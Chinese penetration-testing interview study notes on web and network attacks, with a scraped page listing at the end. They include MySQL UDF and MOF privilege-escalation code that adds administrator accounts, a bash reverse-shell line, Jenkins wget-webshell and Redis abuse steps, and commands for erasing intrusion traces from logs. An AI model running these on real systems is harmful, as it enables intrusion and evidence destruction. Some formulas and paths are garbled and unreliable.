    CSRF是跨站请求伪造攻击,由客户端发起,是由于没有在关键操作执行时进行是否由用户自愿发起的确认

    防御
    验证Referer
    添加token

    token和referer做横向对比,谁安全等级高?
    token安全等级更高,因为并不是任何服务器都可以取得referer,如果从HTTPS跳到HTTP,也不会发送referer。并且FLASH一些版本中可以自定义referer。但是token的话,要保证其足够随机且不可泄露。(不可预测性原则)

    对referer的验证,从什么角度去做?如果做,怎么杜绝问题
    对header中的referer的验证,一个是空referer,一个是referer过滤或者检测不完善。为了杜绝这种问题,在验证的白名单中,正则规则应当写完善。

    针对token,对token测试会注意哪方面内容,会对token的哪方面进行测试?
    针对token的攻击,
    一是对它本身的攻击,重放测试一次性、分析加密规则、校验方式是否正确等,
    二是结合信息泄露漏洞对它的获取,结合着发起组合攻击信息泄露有可能是缓存、日志、get,
    也有可能是利用跨站很多跳转登录的都依赖token,有一个跳转漏洞加反射型跨站就可以组合成登录劫持了另外也可以结合着其它业务来描述token的安全性及设计不好怎么被绕过比如抢红包业务之类的

    七.SSRF
    SSRF(Server-Side Request Forgery:服务器端请求伪造)
    是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
    SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
    检测

    SSRF漏洞的验证方法:
    1)因为SSRF漏洞是让服务器发送请求的安全漏洞,所以我们就可以通过抓包分析发送的请求是否是由服务器的发送的,从而来判断是否存在SSRF漏洞
    2)在页面源码中查找访问的资源地址 ,如果该资源地址类型为 www.baidu.com/xxx.php?image=(地址)的就可能存在SSRF漏洞 4[1]

    SSRF漏洞的成因 防御 绕过
    成因:模拟服务器对其他服务器资源进行请求,没有做合法性验证。利用:构造恶意内网IP做探测,或者使用其余所支持的协议对其余服务进行攻击。防御:禁止跳转,限制协议,内外网限制,URL限制。绕过:使用不同协议,针对IP,IP格式的绕过,针对URL,恶意URL增添其他字符,@之类的。301跳转+dns rebindding。

    八 .上传
    文件上传漏洞原理
    由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件

    常见的上传绕过方式
    前端js验证:禁用js/burp改包
    大小写
    双重后缀名
    过滤绕过 pphphp->php

    防护
    文件上传目录设置为不可执行
    使用白名单判断文件上传类型
    用随机数改写文件名和路径

    审查上传点的元素有什么意义?
    有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。

    文件包含原理
    引入一段用户能控制的脚本或代码,并让服务器端执行 include()等函数通过动态变量的方式引入需要包含的文件;
    用户能够控制该动态变量。
    导致文件包含的函数
    PHP:include(), include_once(), require(), re-quire_once(), fopen(), readfile(), … JSP/Servlet:ava.io.File(), java.io.Fil-eReader(), … ASP:include file, include virtual,
    本地文件包含
    能够打开并包含本地文件的漏洞,被称为本地文件包含漏洞

    金融行业常见逻辑漏洞
    单针对金融业务的 主要是数据的篡改(涉及金融数据,或部分业务的判断数据),由竞争条件或者设计不当引起的薅羊毛,交易/订单信息泄露,水平越权对别人的账户查看或恶意操作,交易或业务步骤绕过。

    九 中间人攻击
    中间人攻击是一个(缺乏)相互认证的攻击;由于客户端与服务器之间在SSL握手的过程中缺乏相互认证而造成的漏洞
    防御中间人攻击的方案通常基于一下几种技术
    1.公钥基础建设PKI 使用PKI相互认证机制,客户端验证服务器,服务器验证客户端;上述两个例子中都是只验证服务器,这样就造成了SSL握手环节的漏洞,而如果使用相互认证的的话,基本可以更强力的相互认证
    2.延迟测试
    使用复杂加密哈希函数进行计算以造成数十秒的延迟;如果双方通常情况下都要花费20秒来计算,并且整个通讯花费了60秒计算才到达对方,这就能表明存在第三方中间人。
    3.使用其他形式的密钥交换形式

    十 ARP欺骗
    原理
    每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。在ARP缓存表机制存在一个缺陷,就是当请求主机收到ARP应答包后,不会去验证自己是否向对方主机发送过ARP请求包,就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中,如果原有相同IP对应关系,原有的则会被替换。这样攻击者就有了偷听主机传输的数据的可能

    防护
    1.在主机绑定网关MAC与IP地址为静态(默认为动态),命令:arp -s 网关IP 网关MAC
    2.在网关绑定主机MAC与IP地址
    3.使用ARP防火墙

    十一.DDOS
    Ddos原理
    利用合理的请求造成资源过载,导致服务不可用

    syn洪流的原理
    伪造大量的源IP地址,分别向服务器端发送大量的SYN包,此时服务器端会返回SYN/ACK包,因为源地址是伪造的,所以伪造的IP并不会应答,服务器端没有收到伪造IP的回应,会重试3~5次并且等待一个SYNTime(一般为30秒至2分钟),如果超时则丢弃这个连接。攻击者大量发送这种伪造源地址的SYN请求,服务器端将会消耗非常多的资源(CPU和内存)来处理这种半连接,同时还要不断地对这些IP进行SYN+ACK重试。最后的结果是服务器无暇理睬正常的连接请求,导致拒绝服务。

    CC攻击原理
    对一些消耗资源较大的应用页面不断发起正常的请求,以达到消耗服务端资源的目的。

    DDOS防护
    SYN Cookie/SYN Proxy、safereset等算法。SYN Cookie的主要思想是为每一个IP地址分配一个“Cookie”,并统计每个IP地址的访问频率。如果在短时间内收到大量的来自同一个IP地址的数据包,则认为受到攻击,之后来自这个IP地址的包将被丢弃。

    十二 提权
    mysql两种提权方式
    udf提权,mof提权
    Mysql_UDF提权
    要求: 1.目标系统是Windows(Win2000,XP,Win2003);2.拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数 3.有root账号密码 导出udf: MYSQL 5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数 可以再mysql里输入select @@basedirshow variables like ‘%plugins%’ 寻找mysql安装路径 提权:
    使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一)returns string soname ‘导出的DLL路径’;
    create function cmdshell returns string soname ‘udf.dll’select cmdshell(‘net user arsch arsch /add’);select cmdshell(‘net localgroup administrators arsch /add’);
    drop function cmdshell;
    该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录即可。

    Mysql mof提权
    #pragma namespace("\\.\root\subscription")
    instance of __EventFilter as $EventFilter{EventNamespace = “Root\Cimv2”;Name = “filtP2”;Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa “Win32_LocalTime” "“And TargetInstance.Second = 5”;QueryLanguage = “WQL”;};
    instance of ActiveScriptEventConsumer as $Consumer{Name = “consPCSV2”;ScriptingEngine = “JScript”;ScriptText =“var WSH = new ActiveXObject(“WScript.Shell”)\nWSH.run(“net.exe user waitalone waitalone.cn /add”)”;};
    instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};
    其中的第18行的命令,上传前请自己更改。
    2、执行load_file及into dumpfile把文件导出到正确的位置即可。
    select load file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mov’
    执行成功后,即可添加一个普通用户,然后你可以更改命令,再上传导出执行把用户提升到管理员权限,然后3389连接之就ok了。

    特殊漏洞
    Struts2-045 Redis未授权访问
    产生原因
    Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器
    利用条件和方法
    条件:
    a、redis服务以root账户运行
    b、redis无密码或弱密码进行认证
    c、redis监听在0.0.0.0公网上
    方法:
    a、通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫
    b、上传SSH公钥获得SSH登录权限
    c、通过crontab反弹shell
    d、slave主从模式利用
    修复
    密码验证
    降权运行
    限制ip/修改端口

    Jenkins未授权访问
    攻击者通过未授权访问进入脚本命令执行界面执行攻击指令
    println “ifconfig -a”.execute().text 执行一些系统命令,利用wget下载webshell

    MongoDB未授权访问
    开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,而且可以远程访问数据库,登录的用户可以通过默认端口无需密码对数据库进行增、删、改、查等任意高危操作。
    防护
    1、为MongoDB添加认证:1)MongoDB启动时添加–auth参数 2)给MongoDB添加用户:use admin #使用admin库 db.addUser(“root”, “123456”) #添加用户名root密码123456的用户 db.auth(“root”,“123456”) #验证下是否添加成功,返回1说明成功 2、禁用HTTP和REST端口 MongoDB自身带有一个HTTP服务和并支持REST接口。在2.6以后这些接口默认是关闭的。mongoDB默认会使用默认端口监听web服务,一般不需要通过web方式进行远程管理,建议禁用。修改配置文件或在启动的时候选择–nohttpinterface 参数nohttpinterface=false 3、限制绑定IP 启动时加入参数 –bind_ip 127.0.0.1 或在/etc/mongodb.conf文件中添加以下内容:bind_ip = 127.0.0.1

    Memcache未授权访问
    Memcached是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者通过命令交互可直接读取Memcached中的敏感信息。
    利用
    1、登录机器执行netstat -an |more命令查看端口监听情况。回显0.0.0.0:11211表示在所有网卡进行监听,存在memcached未授权访问漏洞。
    2、telnet 11211,或nc -vv 11211,提示连接成功表示漏洞存在
    漏洞加固
    a、设置memchached只允许本地访问 b、禁止外网访问Memcached 11211端口 c、编译时加上–enable-sasl,启用SASL认证

    FFMPEG 本地文件读取漏洞
    原理
    通过调用加密API将payload加密放入一个会被执行的段字节中。但是具体回答工程中我只回答道了SSRF老洞,m3u8头,偏移量,加密。

    十三.安全知识
    常用WEB开发JAVA框架
    STRUTS,SPRING 常见的java框架漏洞 其实面试官问这个问题的时候我不太清楚他要问什么,我提到struts的045 048,java常见反序列化。045 错误处理引入了ognl表达式 048 封装action的过程中有一步调用getstackvalue递归获取ognl表达式 反序列化 操作对象,通过手段引入。apache common的反射机制、readobject的重写,其实具体的我也记不清楚。。。然后这部分就结束了

    同源策略
    同源策略限制不同源对当前document的属性内容进行读取或设置。不同源的区分:协议、域名、子域名、IP、端口,以上有不同时即不同源。

    Jsonp安全攻防技术,怎么写Jsonp的攻击页面?
    涉及到Jsonp的安全攻防内容
    JSON劫持、Callback可定义、JSONP内容可定义、Content-type不为json。
    攻击页面
    JSON劫持,跨域劫持敏感信息,页面类似于
    function wooyun(v){alert(v.username);}
    Content-type不正确情况下,JSONP和Callback内容可定义可造成XSS。JSONP和FLASH及其他的利用参照知道创宇的JSONP安全攻防技术。

    PHP
    php中命令执行涉及到的函数
    1,代码执行:eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function() 2,文件读取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等 3,命令执行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
    安全模式下绕过php的disable fuction
    DL函数,组件漏洞,环境变量。
    PHP弱类型
    == 在进行比较的时候,会先将字符串类型转化成相同,再比较
    如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行
    0e开头的字符串等于0

    数据库
    各种数据库文件存放的位置
    mysql:
    /usr/local/mysql/data/
    C:\ProgramData\MySQL\MySQL Server 5.6\Data
    oracle:ORACLEBASE/oradata/ ORACLE_BASE/oradata/ORACLE 
    B
    ​    
     ASE/oradata/ORACLE_SID/
    系统

    如何清理日志
    meterpreter: clearev
    入侵 Linux 服务器后需要清除哪些日志?
    web日志,如apache的access.log,error.log。
    直接将日志清除过于明显,一般使用sed进行定向清除
    e.g. sed -i -e ‘/192.169.1.1/d’
    history命令的清除,也是对~/.bash_history进行定向清除
    wtmp日志的清除,/var/log/wtmp
    登录日志清除 /var/log/secure

    LINUX
    查看当前端口连接的命令有哪些?netstat 和 ss 命令的区别和优缺点
    netstat -antpss -l
    ss的优势在于它能够显示更多更详细的有关TCP和连接状态的信息,而且比netstat更快速更高效。

    反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么?
    bash -i>&/dev/tcp/x.x.x.x/4444 0>&1
    通过Linux系统的/proc目录 ,能够获取到哪些信息,这些信息可以在安全上有哪些应用?
    ls /proc
    系统信息,硬件信息,内核版本,加载的模块,进程
    linux系统中,检测哪些配置文件的配置项,能够提升SSH的安全性。
    /etc/ssh/sshd___configiptables配置

    如何一条命令查看文件内容最后一百行
    tail -n 100 filename

    Windows
    如何加固一个域环境下的Windows桌面工作环境?请给出你的思路。
    十五.密码学
    AES/DES的具体工作步骤
    RSA算法
    加密:
    密文=明文^EmodN
    RSA加密是对明文的E次方后除以N后求余数的过程
    公钥=(E,N)
    解密:
    明文=密文^DmodN 私钥=(D,N)
    三个参数n,e1,e2
    n是两个大质数p,q的积
    分组密码的加密模式
    如何生成一个安全的随机数?
    引用之前一个学长的答案,可以通过一些物理系统生成随机数,如电压的波动、磁盘磁头读/写时的寻道时间、空中电磁波的噪声等。

    SSL握手过程
    建立TCP连接、客户端发送SSL请求、服务端处理SSL请求、客户端发送公共密钥加密过的随机数据、服务端用私有密钥解密加密后的随机数据并协商暗号、服务端跟客户端利用暗号生成加密算法跟密钥key、之后正常通信。这部分本来是忘了的,但是之前看SSL Pinning的时候好像记了张图在脑子里,挣扎半天还是没敢确定,遂放弃。。。
    对称加密与非对称加密的不同,分别用在哪些方面

    TCP/IP
    TCP三次握手的过程以及对应的状态转换
    (1)客户端向服务器端发送一个SYN包,包含客户端使用的端口号和初始序列号x;
    (2)服务器端收到客户端发送来的SYN包后,向客户端发送一个SYN和ACK都置位的TCP报文,包含确认号xx1和服务器端的初始序列号y;
    (3)客户端收到服务器端返回的SYNSACK报文后,向服务器端返回一个确认号为yy1、序号为xx1的ACK报文,一个标准的TCP连接完成。
    TCP和UDP协议区别
    tcp面向连接,udp面向报文 tcp对系统资源的要求多 udp结构简单 tcp保证数据完整性和顺序,udp不保证
    https的建立过程
    a、客户端发送请求到服务器端
    b、服务器端返回证书和公开密钥,公开密钥作为证书的一部分而存在
    c、客户端验证证书和公开密钥的有效性,如果有效,则生成共享密钥并使用公开密钥加密发送到服务器端
    d、服务器端使用私有密钥解密数据,并使用收到的共享密钥加密数据,发送到客户端
    e、客户端使用共享密钥解密数据
    f、SSL加密建立

    流量分析
    wireshark简单的过滤规则
    过滤ip:
    过滤源ip地址:ip.src1.1.1.1;,目的ip地址:ip.dst1.1.1.1;
    过滤端口:
    过滤80端口:tcp.port80,源端口:tcp.srcport80,目的端口:tcp.dstport80
    协议过滤:
    直接输入协议名即可,如http协议http
    http模式过滤:
    过滤get/post包http.request.mothod"GET/POST"

    展开全文
  • 渗透测试工程师从业经验

    万次阅读 多人点赞 2018-03-30 10:18:27
    一、常见问题1、客户系统,之前做过渗透测试,我们要怎么做?深入了解客户系统,一丝不苟发现系统深层次漏洞。2、客户系统,部署了防火墙,我们要怎么做?可以绕过防火墙进行测试,比如通过内部wifi的手段等。客户已...
  • 2018年最新一期cracer web安全渗透测试工程师培训
  • 渗透测试工程师面试题大全(一)

    千次阅读 2020-04-21 19:52:13
    渗透测试工程师面试题大全(一) from:backlion大佬 整理 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、...
  • 渗透测试工程师面试题大全(三)

    千次阅读 2020-04-22 11:08:11
    渗透测试工程师面试题大全(三) from:backlion大佬 整理 101.什么是 WebShell? WebShell 就是以 asp、php、jsp 或者 cgi 等网页文件形式存在的─种命令执行环境,也可以将其称做为─种网页后门。黑客在入侵了─个...
  • 渗透测试工程师面试题大全(二)

    千次阅读 2020-04-22 10:30:12
    渗透测试工程师面试题大全(二) from:backlion大佬 整理 51.sql 注入写文件都有哪些函数? (1)select ‘一句话’ into outfile ‘路径’ (2)select ‘一句话’ into dumpfile ‘路径’ (3) select ‘<?php eval...
  • 相信作为小白,或者初入安全圈的人都会很懵逼,渗透测试工程师的技能树,又或者会哪些。在安全圈里面渗透测试也可以叫web安全工程师 迷迷糊糊的,我也一样,没有方向!! 但是问题不大,嘿嘿 先来看下渗透测试工程师...
  • 感觉工资不是很高的样子,这里有没有渗透大佬?你们都从事什么岗位啊。工资月薪如何?
  • cisp-pte安全渗透工程师,如何成为安全渗透测试工程师?从认识网络安全威胁开始 网络安全威胁是指网络系统所面临的,由已经发生的或潜在的安全事件对某一资源的保密性、完整性、可用性或合法使用所造成的威胁。能够...
  • 毕业后的自己,做了一年的网络工程师,每每发现实在是不喜欢时,就想鼓起勇气转行和跳槽,但是在此过程中,总是不停地被别人和自己怀疑,到底是没有耐心还是自己的能力不足,总是在被面试人员问的一脸茫然的梦中惊醒...
  • WEB渗透测试工程师需要具备的技能

    千次阅读 2019-05-01 00:37:19
  • 思考了很长时间,最近一直在准备安全服务工程师的面试题,说到底还是自己学的不够扎实,理解的不够深刻,想到CSDN可以写笔记,还能跟大家一同分享,就渐渐的喜欢上了这里。 自我介绍 首先肯定是一段必不可少的自我...
  • 本篇面试题是关于常规的基础网络知识 0x00 TCP/UDP 三次握手 SYN攻击 TCP的优点: 可靠,稳定 TCP的可靠体现在TCP在传递数据之前,会有三次握手来建立连接,而且在数据传递时,有确认、窗口、重传、拥塞控制机制, ...
  • 2018最新一期cracer渗透测试工程师培训教程,该教程包括cracer 2018最新的渗透测试教程,以及第一期,第三期,第五期的视频教程,我都打包放在了百度云盘里了,需要的朋友加我微信:1225172396 免费获取该教程 ...
  • 常见渗透测试工程师面试汇总 1.自我介绍 可根据自己的自身情况来介绍,把自己的优势说出来,缺点就不要说了。 最好有挖洞经验或者提交过被收录的漏洞编号。 2.你怎么挖掘到的漏洞,具体的步骤 自己挖到的漏洞...
  • 可以说是非常全面了,把大纲内的知识点全部了解并可以实操,考试必过,工资必涨。
  • 前言 可能有些人不知道为什么要学会 osi七层,不知道osi网络模型重要性 其实我们攻击的时候一般都是在传输层之上的~~~ 1 . 我 们 只 有知 道 了通 信 ... 2 ....不要问我为什么,大家都是小白来的~~~ 我会尽我自己...

空空如也

1 2 3 4 5 ... 20
收藏数 389
精华内容 155
关键字:

渗透测试工程师